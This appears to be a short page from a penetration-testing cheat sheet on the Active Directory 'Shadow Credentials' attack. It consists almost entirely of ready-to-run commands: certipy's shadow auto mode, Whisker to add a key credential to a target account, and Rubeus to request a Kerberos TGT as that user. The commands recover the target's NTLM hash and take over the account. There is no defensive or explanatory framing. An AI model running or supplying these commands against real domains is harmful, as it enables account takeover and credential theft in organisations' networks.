Shadow Credentials
Exploit
Scenario
Last updated
Last updated
## Generates keys, adds Shadow Credential, authenticates using the private key to
## get TGT, and does a UnPAC the hash attack to get the NTLM hash for UserB
certipy shadow \
-u '[email protected]' -p 'password' \
-dc-ip [DC IP] -account 'UserB' \
auto## Generate and add a Shadow Credential to UserB
Whisker.exe add /target:'UserB' /domain:[domain] /dc:[DC FQDN]
## Authenticate as UserB using the private key to get TGT
Rubeus.exe asktgt /user:'UserB' /certificate:[base64 certificate] /domain:[domain] /dc:[DC FQDN]